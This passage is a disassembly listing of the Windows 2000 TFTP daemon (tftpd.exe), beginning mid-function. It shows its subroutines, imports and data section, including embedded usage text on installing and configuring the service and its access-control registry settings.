sub_1002A3D push eax push dword_10060A0 call ds:dword_1001178 mov eax, [ebp+arg_0] mov ecx, [ebx+10024h] mov [ebx+24h], edi cmp ecx, esi mov eax, [eax+20h] mov [ebx+10018h], eax lea eax, [ebx+10024h] jz short loc_10036A1 mov [ebx+10020h], ecx mov [eax], esi jmp short loc_10036C5 ; --------------------------------------------------------------------------- loc_10036A1: ; CODE XREF: sub_100333A+35Bj mov esi, ds:dword_1001104 push 4 pop edi push edi call esi ; dword_1001104 mov [ebx+38h], ax mov ax, [ebx+10014h] push eax call esi ; dword_1001104 mov [ebx+3Ah], ax mov [ebx+10020h], edi loc_10036C5: ; CODE XREF: sub_100333A+365j push 10h lea eax, [ebx+38h] push [ebp+var_18] push 0 push dword ptr [ebx+10020h] push eax push [ebp+var_4] call ds:dword_1001130 cmp eax, 0FFFFFFFFh jnz short loc_1003712 call ds:dword_10010F8 jmp short loc_1003712 ; --------------------------------------------------------------------------- loc_10036EC: ; CODE XREF: sub_100333A+16Fj ; sub_100333A+184j call ds:dword_10010AC loc_10036F2: ; CODE XREF: sub_100333A+1DFj push 0 push 2 jmp short loc_10036FC ; --------------------------------------------------------------------------- loc_10036F8: ; CODE XREF: sub_100333A+113j push 0 push 4 loc_10036FC: ; CODE XREF: sub_100333A+1A7j ; sub_100333A+207j ... mov eax, [ebp+arg_0] push dword ptr [eax+8] lea ecx, [eax+0FFF1h] add eax, 0Ch push ecx push eax loc_100370D: ; CODE XREF: sub_100333A+24Bj call sub_100230A loc_1003712: ; CODE XREF: sub_100333A+48j ; sub_100333A+274j ... test ebx, ebx jz short loc_1003731 cmp [ebp+var_10], 0 jz short loc_1003723 push ebx call ds:dword_100104C loc_1003723: ; CODE XREF: sub_100333A+3E0j cmp [ebp+var_14], 0 jnz short loc_1003731 push ebx call ds:dword_10010A0 pop ecx loc_1003731: ; CODE XREF: sub_100333A+21j ; sub_100333A+3DAj ... pop edi pop esi xor eax, eax pop ebx leave retn 4 sub_100333A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100373A proc near ; CODE XREF: sub_1002CE6+D7p var_1FF70 = byte ptr -1FF70h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp mov eax, 1FF70h call sub_1003A3E cmp [ebp+arg_C], 8000h push esi push edi jnz short loc_100375A push [ebp+arg_8] push [ebp+arg_4] jmp short loc_1003792 ; --------------------------------------------------------------------------- loc_100375A: ; CODE XREF: sub_100373A+16j mov edx, [ebp+arg_4] xor ecx, ecx xor esi, esi cmp [ebp+arg_8], ecx jle short loc_1003790 mov edi, [ebp+arg_10] loc_1003769: ; CODE XREF: sub_100373A+54j cmp byte ptr [edi], 0Dh jnz short loc_1003779 cmp byte ptr [ecx+edx], 0 jnz short loc_1003779 and byte ptr [edi], 0 jmp short loc_100378A ; --------------------------------------------------------------------------- loc_1003779: ; CODE XREF: sub_100373A+32j ; sub_100373A+38j mov al, [ecx+edx] mov [ebp+esi+var_1FF70], al inc esi cmp al, 0Dh jnz short loc_100378A mov [edi], al loc_100378A: ; CODE XREF: sub_100373A+3Dj ; sub_100373A+4Cj inc ecx cmp ecx, [ebp+arg_8] jl short loc_1003769 loc_1003790: ; CODE XREF: sub_100373A+2Aj push esi push edx loc_1003792: ; CODE XREF: sub_100373A+1Ej push [ebp+arg_0] call ds:dword_10010E8 mov edi, eax add esp, 0Ch cmp edi, 0FFFFFFFFh jnz short loc_10037B7 mov esi, ds:dword_10010AC call esi ; dword_10010AC call esi ; dword_10010AC push dword ptr [eax] call ds:dword_100102C loc_10037B7: ; CODE XREF: sub_100373A+69j mov eax, edi pop edi pop esi leave retn 14h sub_100373A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_10037BF proc near ; CODE XREF: sub_1001665:loc_10017F3p var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 10h lea eax, [ebp+var_10] push ebx xor ebx, ebx push eax push 0F003Fh push ebx push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"... push 80000002h mov [ebp+var_4], ebx call ds:dword_1001000 cmp eax, ebx jz short loc_10037F6 call ds:dword_1001038 xor eax, eax jmp loc_100390D ; --------------------------------------------------------------------------- loc_10037F6: ; CODE XREF: sub_10037BF+28j cmp byte ptr dword_1005E07+1, bl push edi push esi mov esi, ds:dword_1001008 jnz short loc_100383C lea eax, [ebp+var_8] mov [ebp+var_8], 1F4h push eax lea eax, [ebp+var_C] push (offset dword_1005E07+1) push eax push ebx push offset aDirectory ; "directory" push [ebp+var_10] call esi ; dword_1001008 cmp eax, ebx jz short loc_1003831 call ds:dword_1001038 jmp short loc_100383C ; --------------------------------------------------------------------------- loc_1003831: ; CODE XREF: sub_10037BF+68j push 1 pop eax cmp [ebp+var_C], eax jnz short loc_100383C mov [ebp+var_4], eax loc_100383C: ; CODE XREF: sub_10037BF+45j ; sub_10037BF+70j ... push 32h lea eax, [ebp+var_8] pop edi push eax lea eax, [ebp+var_C] push offset dword_1005CE8 push eax push ebx push offset aClients ; "clients" push [ebp+var_10] mov [ebp+var_8], edi call esi ; dword_1001008 cmp eax, ebx jz short loc_1003866 call ds:dword_1001038 jmp short loc_100386F ; --------------------------------------------------------------------------- loc_1003866: ; CODE XREF: sub_10037BF+9Dj cmp [ebp+var_C], 1 jnz short loc_100386F inc [ebp+var_4] loc_100386F: ; CODE XREF: sub_10037BF+A5j ; sub_10037BF+ABj lea eax, [ebp+var_8] mov [ebp+var_8], edi push eax lea eax, [ebp+var_C] push offset dword_1005D20 push eax push ebx push offset aMasters ; "masters" push [ebp+var_10] call esi ; dword_1001008 cmp eax, ebx jz short loc_1003896 call ds:dword_1001038 jmp short loc_100389F ; --------------------------------------------------------------------------- loc_1003896: ; CODE XREF: sub_10037BF+CDj cmp [ebp+var_C], 1 jnz short loc_100389F inc [ebp+var_4] loc_100389F: ; CODE XREF: sub_10037BF+D5j ; sub_10037BF+DBj lea eax, [ebp+var_8] mov [ebp+var_8], edi push eax lea eax, [ebp+var_C] push offset dword_1005D58 push eax push ebx push offset aReadable ; "readable" push [ebp+var_10] call esi ; dword_1001008 cmp eax, ebx jz short loc_10038C6 call ds:dword_1001038 jmp short loc_10038CF ; --------------------------------------------------------------------------- loc_10038C6: ; CODE XREF: sub_10037BF+FDj cmp [ebp+var_C], 1 jnz short loc_10038CF inc [ebp+var_4] loc_10038CF: ; CODE XREF: sub_10037BF+105j ; sub_10037BF+10Bj lea eax, [ebp+var_8] mov [ebp+var_8], edi push eax lea eax, [ebp+var_C] push offset dword_1005D90 push eax push ebx push offset aWritable ; "writable" push [ebp+var_10] call esi ; dword_1001008 cmp eax, ebx jz short loc_10038F6 call ds:dword_1001038 jmp short loc_10038FF ; --------------------------------------------------------------------------- loc_10038F6: ; CODE XREF: sub_10037BF+12Dj cmp [ebp+var_C], 1 jnz short loc_10038FF inc [ebp+var_4] loc_10038FF: ; CODE XREF: sub_10037BF+135j ; sub_10037BF+13Bj push [ebp+var_10] call ds:dword_100100C mov eax, [ebp+var_4] pop esi pop edi loc_100390D: ; CODE XREF: sub_10037BF+32j pop ebx leave retn sub_10037BF endp ; =============== S U B R O U T I N E ======================================= sub_1003910 proc near ; CODE XREF: sub_1001665+193p var_1F4 = byte ptr -1F4h sub esp, 1F4h cmp byte ptr dword_1005E07+1, 0 push ebx push ebp push esi push edi mov ebp, 1F4h mov ebx, (offset dword_1005E07+1) jnz short loc_100393D push ebp push offset aTftpdroot ; "\\tftpdroot\\" push ebx call ds:dword_1001148 add esp, 0Ch loc_100393D: ; CODE XREF: sub_1003910+1Bj lea eax, [esp+204h+var_1F4] push ebp push eax push ebx call ds:dword_1001020 test eax, eax jnz short loc_1003952 push 57h jmp short loc_10039CA ; --------------------------------------------------------------------------- loc_1003952: ; CODE XREF: sub_1003910+3Cj mov ecx, eax lea esi, [esp+204h+var_1F4] mov edi, ebx or edx, 0FFFFFFFFh shr ecx, 2 rep movsd mov ecx, eax xor eax, eax and ecx, 3 rep movsb mov edi, ebx mov ecx, edx repne scasb not ecx dec ecx cmp byte ptr dword_1005E07[ecx], 2Fh lea eax, dword_1005E07[ecx] jnz short loc_1003986 mov byte ptr [eax], 5Ch loc_1003986: ; CODE XREF: sub_1003910+71j cmp byte ptr [eax], 5Ch jz short loc_10039B7 cmp ecx, ebp jnb short loc_10039B7 mov edi, offset asc_100155C ; "\\" mov ecx, edx xor eax, eax repne scasb not ecx sub edi, ecx mov esi, edi mov ebp, ecx mov edi, ebx mov ecx, edx repne scasb mov ecx, ebp dec edi shr ecx, 2 rep movsd mov ecx, ebp and ecx, 3 rep movsb loc_10039B7: ; CODE XREF: sub_1003910+79j ; sub_1003910+7Dj mov edi, ebx mov ecx, edx xor eax, eax push 1 repne scasb not ecx dec ecx mov dword_1005FFC, ecx loc_10039CA: ; CODE XREF: sub_1003910+40j pop eax pop edi pop esi pop ebp pop ebx add esp, 1F4h retn sub_1003910 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_10039D6 proc near ; CODE XREF: sub_1002F31+148p ; sub_1002F31+159p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi mov al, [esi] test al, al jz short loc_1003A2E cmp al, 2Ah jz short loc_1003A04 cmp al, 3Fh jz short loc_10039F7 mov ecx, [ebp+arg_4] cmp al, [ecx] jnz short loc_1003A25 inc ecx push ecx jmp short loc_1003A01 ; --------------------------------------------------------------------------- loc_10039F7: ; CODE XREF: sub_10039D6+14j mov eax, [ebp+arg_4] cmp byte ptr [eax], 0 jz short loc_1003A25 inc eax push eax loc_1003A01: ; CODE XREF: sub_10039D6+1Fj inc esi jmp short loc_1003A1B ; --------------------------------------------------------------------------- loc_1003A04: ; CODE XREF: sub_10039D6+10j mov edi, [ebp+arg_4] lea eax, [esi+1] push edi push eax call sub_10039D6 test eax, eax jnz short loc_1003A29 cmp [edi], al jz short loc_1003A25 inc edi push edi loc_1003A1B: ; CODE XREF: sub_10039D6+2Cj push esi call sub_10039D6 test eax, eax jnz short loc_1003A29 loc_1003A25: ; CODE XREF: sub_10039D6+1Bj ; sub_10039D6+27j ... xor eax, eax jmp short loc_1003A38 ; --------------------------------------------------------------------------- loc_1003A29: ; CODE XREF: sub_10039D6+3Dj ; sub_10039D6+4Dj push 1 pop eax jmp short loc_1003A38 ; --------------------------------------------------------------------------- loc_1003A2E: ; CODE XREF: sub_10039D6+Cj mov ecx, [ebp+arg_4] xor eax, eax cmp [ecx], al setz al loc_1003A38: ; CODE XREF: sub_10039D6+51j ; sub_10039D6+56j pop edi pop esi pop ebp retn 8 sub_10039D6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003A3E proc near ; CODE XREF: sub_1001A91+5p ; sub_100230A+8p ... jmp ds:dword_100116C sub_1003A3E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003A44 proc near ; CODE XREF: sub_10018DB+FEp ; sub_1002219+DAp jmp ds:dword_1001138 sub_1003A44 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003A4A proc near ; CODE XREF: sub_1001FA6+1Fp ; sub_1001FA6+43p jmp ds:dword_100113C sub_1003A4A endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_1001560 push offset loc_1003BF0 mov eax, large fs:0 push eax mov large fs:0, esp add esp, 0FFFFFFE0h push ebx push esi push edi mov [ebp-18h], esp mov dword ptr [ebp-4], 0 push 1 call ds:dword_10010C4 add esp, 4 mov dword_10062D0, 0FFFFFFFFh mov dword_10062D4, 0FFFFFFFFh call ds:dword_10010C8 mov ecx, dword_100600C mov [eax], ecx call ds:dword_10010CC mov edx, dword_1006008 mov [eax], edx mov eax, ds:dword_10010D0 mov ecx, [eax] mov dword_10062D8, ecx call nullsub_2 mov eax, dword_1005DC4 test eax, eax jnz short loc_1003AE1 push offset loc_1003BD0 call ds:dword_1001084 add esp, 4 loc_1003AE1: ; CODE XREF: .text:01003AD1j call sub_1003BB0 push offset dword_100500C push offset dword_1005008 call sub_1003BA6 add esp, 8 mov edx, dword_1006004 mov [ebp-28h], edx lea eax, [ebp-28h] push eax mov ecx, dword_1006000 push ecx lea edx, [ebp-20h] push edx lea eax, [ebp-2Ch] push eax lea ecx, [ebp-1Ch] push ecx call ds:dword_1001080 add esp, 14h push offset dword_1005004 push offset dword_1005000 call sub_1003BA6 add esp, 8 call ds:dword_10010D8 mov edx, [ebp-20h] mov [eax], edx mov eax, [ebp-20h] push eax mov ecx, [ebp-2Ch] push ecx mov edx, [ebp-1Ch] push edx call sub_1001570 add esp, 0Ch mov [ebp-24h], eax push eax call ds:dword_10010EC jmp short loc_1003B80 ; --------------------------------------------------------------------------- mov eax, [ebp-14h] mov ecx, [eax] mov ecx, [ecx] mov [ebp-30h], ecx push eax push ecx call sub_1003BA0 add esp, 8 retn ; --------------------------------------------------------------------------- mov esp, [ebp-18h] mov edx, [ebp-30h] push edx call ds:dword_10010DC+4 loc_1003B80: ; CODE XREF: .text:01003B5Cj add esp, 4 mov dword ptr [ebp-4], 0FFFFFFFFh mov ecx, [ebp-10h] mov large fs:0, ecx pop edi pop esi pop ebx mov esp, ebp pop ebp retn ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003BA0 proc near ; CODE XREF: .text:01003B6Ap jmp ds:dword_10010DC sub_1003BA0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003BA6 proc near ; CODE XREF: .text:01003AF0p ; .text:01003B2Bp jmp ds:dword_100107C sub_1003BA6 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_1003BB0 proc near ; CODE XREF: .text:loc_1003AE1p push 30000h push 10000h call sub_1003BF6 add esp, 8 retn sub_1003BB0 endp ; --------------------------------------------------------------------------- align 10h loc_1003BD0: ; DATA XREF: .text:01003AD3o xor eax, eax retn ; --------------------------------------------------------------------------- align 10h ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND] align 10h loc_1003BF0: ; DATA XREF: .text:01003A5Ao jmp ds:dword_10010C0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_1003BF6 proc near ; CODE XREF: sub_1003BB0+Ap jmp ds:dword_10010BC sub_1003BF6 endp ; --------------------------------------------------------------------------- dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh) dd 4012h, 101Ch, 3C88h, 2 dup(0FFFFFFFFh), 40A2h, 1000h dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh) dd 41A2h, 1138h, 3D04h, 2 dup(0FFFFFFFFh), 42F6h, 107Ch dd 5 dup(0) dd 4092h, 4020h, 407Eh, 4070h, 4052h, 403Eh, 0 dd 3E6Ch, 3FF6h, 3FE6h, 3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah dd 3E8Ah, 3EA0h, 3EB0h, 3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch dd 3F24h, 3F3Ch, 3F56h, 3F62h, 3F70h, 3F78h, 3F92h, 0 dd 4282h, 4272h, 428Eh, 4230h, 4226h, 421Eh, 4214h, 420Ah dd 4200h, 41F8h, 41F0h, 41E6h, 41DCh, 41D2h, 41CAh, 41C2h dd 4302h, 42E2h, 42D0h, 42C2h, 42B2h, 42A2h, 41B8h, 4262h dd 4254h, 424Ch, 423Ah, 4242h, 41B0h, 0 dd 3E52h, 8000006Fh, 80000073h, 3E08h, 80000009h, 3E1Ah dd 8000000Fh, 3E34h, 8000000Ah, 3E42h, 80000003h, 8000000Ch dd 80000002h, 80000037h, 80000017h, 80000014h, 0 dd 417Ch, 4190h, 0 dd 4126h, 4168h, 415Eh, 4154h, 4142h, 4130h, 411Ah, 4112h dd 410Ah, 40F4h, 40EAh, 40D4h, 40B0h, 40C2h, 0 dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h aWsagetoverlapp db 'WSAGetOverlappedResult',0 align 4 a2 db '2',0 aWsarecvfrom db 'WSARecvFrom',0 dw 0Fh aWsacloseevent db 'WSACloseEvent',0 db '=',0 aWsasocketa db 'WSASocketA',0 align 10h aWs2_32_dll db 'WS2_32.dll',0 align 4 aM db '',0 aExitprocess db 'ExitProcess',0 dw 12Dh aGetlasterror db 'GetLastError',0 align 2 dw 2FDh aWaitforsingleo db 'WaitForSingleObject',0 a4 db '4',0 aCreateeventa db 'CreateEventA',0 align 10h db 0C5h ; db 1, 49h, 6Eh aItializecritic db 'itializeCriticalSection',0 dd 654801B6h, 72437061h, 65746165h, 1DE0000h aLeavecriticals db 'LeaveCriticalSection',0 align 2 dw 1BAh aHeapfree db 'HeapFree',0 align 2 dw 1Eh aClosehandle db 'CloseHandle',0 aO db 'o',0 aEntercriticals db 'EnterCriticalSection',0 align 4 retf ; --------------------------------------------------------------------------- db 1, 49h, 6Eh aTerlockedincre db 'terlockedIncrement',0 align 4 db 0FBh ; db 2, 57h, 61h aItformultipleo db 'itForMultipleObjects',0 align 2 dw 1B4h aHeapalloc db 'HeapAlloc',0 dw 252h aResetevent db 'ResetEvent',0 align 10h retn ; --------------------------------------------------------------------------- db 2, 53h, 6Ch db 65h ; e db 65h, 70h, 0 db 0D8h ; db 2, 54h, 72h aYentercritical db 'yEnterCriticalSection',0 dw 2C5h aSuspendthread db 'SuspendThread',0 dw 254h aResumethread db 'ResumeThread',0 db 0, 90h, 2 aSetevent db 'SetEvent',0 align 2 dw 29Ch aSetlasterror db 'SetLastError',0 align 2 aZ db 'Z',0 aDeletecritical db 'DeleteCriticalSection',0 dw 12Fh aGetlocaltime db 'GetLocalTime',0 align 2 aP db '',0 aExpandenvironm db 'ExpandEnvironmentStringsA',0 aKernel32_dll db 'KERNEL32.dll',0 align 10h db 0E5h ; db 1, 53h, 74h aArtservicectrl db 'artServiceCtrlDispatcherA',0 dw 1DFh aSetservicestat db 'SetServiceStatus',0 align 2 dw 1B9h aRegisterservic db 'RegisterServiceCtrlHandlerA',0 db 84h ; db 1, 52h, 65h aGclosekey db 'gCloseKey',0 dw 1A7h aRegqueryvaluee db 'RegQueryValueExA',0 align 2 dw 19Dh aRegopenkeyexa db 'RegOpenKeyExA',0 aAdvapi32_dll db 'ADVAPI32.dll',0 align 10h db 50h ; P db 2, 52h, 74h aLregisterwait db 'lRegisterWait',0 dw 184h aRtlcreatetimer db 'RtlCreateTimer',0 align 4 db 85h ; db 1, 52h, 74h aLcreatetimerqu db 'lCreateTimerQueue',0 dw 42Eh a_chkstk db '_chkstk',0 db 0A1h ; db 1, 52h, 74h aLderegisterwai db 'lDeregisterWaitEx',0 dw 433h a_itoa db '_itoa',0 dw 450h aAtoi db 'atoi',0 align 2 dw 43Dh a_stricmp db '_stricmp',0 align 2 dw 46Dh aMemmove db 'memmove',0 dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch dd 45F0072h, 70757369h, 726570h, 7473047Dh, 70636E72h dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h dd 72646441h, 6E616843h, 6567h, 65470022h, 41704974h, 54726464h dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h dd 7469h, 7270029Bh, 66746E69h, 2430000h, 6D697463h, 2540065h dd 65706F66h, 17F006Eh, 646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h dd 0AA0000h, 6468635Fh, 7269h, 697402CDh, 656Dh, 7266025Bh dd 6565h, 63660249h, 65736F6Ch, 2A40000h, 6C616572h, 636F6Ch dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h dd 6F6C635Fh, 6573h, 6C5F0141h, 6B656573h, 1840000h, 65706F5Fh dd 214006Eh, 6972775Fh, 6574h, 655F00D0h, 746978h, 585F0048h dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh dd 10C0073h, 696E695Fh, 72657474h, 82006Dh, 65735F5Fh dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h dd 6C6C642Eh, 0B40000h, 6E6F635Fh, 6C6F7274h, 7066h dd 3Ch dup(?) _text ends ; Section 2. (virtual address 00005000) ; Virtual size : 000012DC ( 4828.) ; Section size in file : 000012DC ( 4828.) ; Offset to raw data for section: 00005000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _data segment para public 'DATA' use32 assume cs:_data ;org 1005000h dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 asc_1005010 db ' ================================================================' ; DATA XREF: sub_1001570+4Do db '======== ',0Ah db 'Abstract: ' db ' ',0Ah db ' This implements an RFC 783 tftp daemon. ' db ' ',0Ah db ' It listens on port 69 for requests ' db ' ',0Ah db ' and spawns a thread to process each request. ' db ' ',0Ah db ' ' db ' ',0Ah db 'TFTPD USAGE and Installation: ' db ' ',0Ah db ' ' db ' ',0Ah db ' md d:/tftpd (the StartDirec' db 'tory). ',0Ah db ' copy //MohsinA_p90/test/tftpd.exe . ' db ' ',0Ah db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path' db '). ',0Ah db ' sc query tftpd (check if insta' db 'lled). ',0Ah db ' ' db ' ',0Ah db 'Start: ' db ' ',0Ah db ' sc start tftpd -f (creates a log ' db 'file). ',0Ah db 'or sc start tftpd ' db ' ',0Ah db 'or net start tftpd ' db ' ',0Ah db 'or sc start tftpd [-dStartDirectory] [-e] [-f] ' db ' ',0Ah db ' Options: -e use event log. ' db ' ',0Ah db ' -f log to file. ' db ' ',0Ah db ' -dStartDirectory ' db ' ',0Ah db 'Info: ' db ' ',0Ah db ' sc interrogate tftpd (logs will be updated). ' db ' ',0Ah db ' sc query tftpd Check whether running. ' db ' ',0Ah db 'Stop: ' db ' ',0Ah db ' sc stop tftpd ' db ' ',0Ah db ' net stop tftpd ' db ' ',0Ah db ' ' db ' ',0Ah db 'Variables that control what files can be read/written and by whom' db ': ',0Ah db ' StartDirectory - only files there will be accessible. ' db ' ',0Ah db ' LogFile is created here. ' db ' ',0Ah db ' ValidClients - Clients matching this ip address can read files' db '. ',0Ah db ' eg. you can set it to "157.55.8?.*" ' db ' ',0Ah db ' ValidMasters - clients matching this can write and read file' db 's. ',0Ah db ' eg. you can set it to "" and no one can write' db '. ',0Ah db ' ValidReadFiles - only matching files will be served out, eg. "' db 'r*.t?t"',0Ah db ' ValidWriteFiles- only matching files will be accepted, eg. "w' db '*.txt" ',0Ah db ' ' db ' ',0Ah db 'Client: ' db ' ',0Ah db ' tftp [-i] servername {get|put} src_file dest_file ' db ' ',0Ah db ' -i from binary mode, else ascii mode is used. ' db ' ',0Ah db ' ' db ' ',0Ah db ' ================================================================' db '======== ',0Ah,0 align 8 aTftpd db 'Tftpd',0 ; DATA XREF: sub_1001665+Bo ; .data:off_1005CB0o align 10h off_1005CB0 dd offset aTftpd ; DATA XREF: sub_1001570:loc_1001646o ; "Tftpd" dd offset sub_1001665 align 10h off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73r ; "Error undefined" dd offset aFileNotFound ; "File not found" dd offset aAccessViolatio ; "Access violation" dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded" dd offset aIllegalTftpOpe ; "Illegal TFTP operation" dd offset aUnknownTransfe ; "Unknown transfer ID" dd offset aFileAlreadyExi ; "File already exists" dd offset aNoSuchUser ; "No such user" dd offset aOptionNegotiat ; "Option negotiation failure" align 8 dword_1005CE8 dd 2Ah, 0Dh dup(0) ; sub_10037BF+87o dword_1005D20 dd 2Ah, 0Dh dup(0) ; sub_100333A+163o ... dword_1005D58 dd 2Ah, 0Dh dup(0) ; sub_10037BF+EAo dword_1005D90 dd 2Ah, 0Ch dup(0) ; sub_10037BF+11Ao dword_1005DC4 dd 1 align 10h dword_1005DD0 dd 0 ; sub_1001E73:loc_1001F36r ... dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182Er ... dword_1005DDC dd 0 ; sub_1001665+8Br ... dword_1005DE0 dd 0 ; sub_1001E73:loc_1001F0Cr ... align 8 dword_1005DE8 dd 0 ; sub_1001A91+2B3o dword_1005DEC dd 0 ; sub_1001A1F+52r ... dword_1005DF0 dd 0 ; sub_1001A1F+5Ew ... dword_1005DF4 dd 0 ; sub_1001A91+59w ... dword_1005DF8 dd 0 ; sub_10018DB+EFr dword_1005DFC dd 0 dword_1005E00 dd 0 ; sub_1002219+D5o db 3 dup(0) dword_1005E07 dd 0 ; sub_1003910+6Br ... align 4 dd 7Ch dup(0) dword_1005FFC dd 0 dword_1006000 dd 0 dword_1006004 dd 0 dword_1006008 dd 0 dword_100600C dd 0 dd 4 dup(0) dword_1006020 dd 6 dup(0) ; .text:01001D78o ... dword_1006038 dd 0 ; sub_10018DB+34w ... dword_100603C dd 0 dword_1006040 dd 0 ; sub_1001DEB:loc_1001E35r dword_1006044 dd 0 ; sub_1001665+DBr ... dword_1006048 dd 6 dup(0) dword_1006060 dd 6 dup(0) ; sub_1001A1F+2o ... dword_1006078 dd 0 ; sub_10019F0+Fw ... dword_100607C dd 0 dword_1006080 dd 6 dup(0) ; sub_100287F+1o ... dword_1006098 dd 0 ; sub_10018DB+25w ... dword_100609C dd 0 dword_10060A0 dd 0 ; sub_10018DB+A2r ... dd 7 dup(0) dword_10060C0 dd 0 ; sub_1001665:loc_1001857o dword_10060C4 dd 0 dword_10060C8 dd 0 dword_10060CC dd 0 dd 0Ch dup(0) dword_1006100 dd 4 dup(0) ; sub_1002219:loc_10022E9o dword_1006110 dd 0 align 10h dword_1006120 dd 0 ; sub_1001665+63o ... dword_1006124 dd 0 ; sub_1001665+D1w ... dword_1006128 dd 0 ; sub_1001665+E1w dword_100612C dd 0 ; sub_1001E73+5Aw ... dword_1006130 dd 0 ; sub_1001E73+60w ... dword_1006134 dd 0 ; sub_1001665+EBw ... dword_1006138 dd 0 ; sub_1001665+F1w ... align 10h dword_1006140 dd 64h dup(0) dword_10062D0 dd 0 dword_10062D4 dd 0 dword_10062D8 dd 0 align 200h _data ends ; Section 3. (virtual address 00007000) ; Virtual size : 00007400 ( 29696.) ; Section size in file : 00007400 ( 29696.) ; Offset to raw data for section: 00007000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute _rsrc segment para public 'CODE' use32 assume cs:_rsrc ;org 1007000h assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing dd 3 dup(0) dd 10000h, 10h, 80000018h, 3 dup(0) dd 10000h, 1, 80000030h, 3 dup(0) dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0) dd 340374h, 560000h, 5F0053h, 450056h, 530052h, 4F0049h dd 5F004Eh, 4E0049h, 4F0046h, 0 dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h dd 3Fh, 0 dd 40004h, 1, 3 dup(0) dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh dd 65006Dh, 0 aMicrosoftCorpo: unicode 0, <Microsoft Corporation>,0 aR: unicode 0, <r%> dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h dd 690074h, 6E006Fh, 0 aTcpIpTrivialFi: unicode 0, <TCP/IP Trivial file transfer daemon.>,0 align 4 a8 db '8',0 dw 0Ch dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh dd 0 a5_00_2134_1: unicode 0, <5.00.2134.1>,0 a4_0: unicode 0, <4> dw 0Ah dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h dd 750064h, 740063h, 61004Eh, 65006Dh, 0 aMicrosoftRWind: unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0 align 4 db '<',0 dw 0Ch dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h dd 6F0066h, 0 dd 40024h, 